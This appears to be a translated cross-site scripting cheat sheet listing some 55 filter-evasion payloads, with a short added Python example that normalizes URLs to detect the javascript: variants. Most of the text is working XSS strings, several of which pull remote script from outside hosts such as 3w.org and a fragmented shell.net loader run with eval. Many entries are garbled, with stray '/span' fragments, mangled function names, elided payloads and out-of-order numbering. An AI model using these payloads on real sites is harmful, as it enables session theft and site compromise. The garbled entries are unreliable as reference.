(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative ways to pop an alert
<q/oncut=alert()>
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around a character limit (all fragments must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
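Items 3 to 18 above all hide the same javascript: scheme behind case changes, HTML character references with and without semicolons, embedded tabs, newlines and carriage returns, and null bytes. The following is an added example, not code from this page, showing why an exact-match filter misses those variants and how decoding references and stripping control characters before the scheme is compared catches them; the sample attribute values are constructed from the variants listed above.

```python
import html
import re

# Exact, case-sensitive prefix check: the kind of filter items 3-18 above defeat.
def naive_is_script_url(value: str) -> bool:
    return value.startswith("javascript:")

# Browsers ignore ASCII control characters (NUL, TAB, LF, CR, ...) and DEL
# inside a URL scheme, so they must be removed before the scheme is compared.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")
_SCRIPT_SCHEMES = ("javascript:", "vbscript:")

def normalize_url(value: str) -> str:
    """Approximate the scheme a browser would see for an attribute value."""
    decoded = html.unescape(value)           # &#106; &#x6A; &#0000106 and forms without ';'
    no_controls = _CONTROL.sub("", decoded)  # embedded NUL, tab, newline, carriage return
    return no_controls.strip().lower()       # leading spaces and mixed case

def is_script_url(value: str) -> bool:
    return normalize_url(value).startswith(_SCRIPT_SCHEMES)

# Constructed attribute values mirroring the variants listed on this page.
SAMPLES = {
    "plain":      "javascript:alert('XSS')",
    "mixed_case": "JaVaScRiPt:alert('XSS')",
    "dec_entity": "&#106;&#97;&#118;&#97;script:alert('XSS')",
    "hex_entity": "&#x6A&#x61&#x76&#x61script:alert('XSS')",
    "tab_entity": "jav&#x09;ascript:alert('XSS')",
    "newline":    "jav\nascript:alert('XSS')",
    "null_byte":  "java\x00script:alert('XSS')",
    "lead_space": " &#14;  javascript:alert('XSS')",
    "benign":     "https://example.invalid/logo.png",
}

def compare() -> dict:
    """Map each sample name to (naive verdict, normalized verdict)."""
    return {name: (naive_is_script_url(v), is_script_url(v)) for name, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in compare().items():
        print(f"{name:11} naive={naive!s:5} normalized={hardened}")
```

The naive check flags only the plain form; the normalized check flags every scripted variant and still passes the benign URL.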
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE approach
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>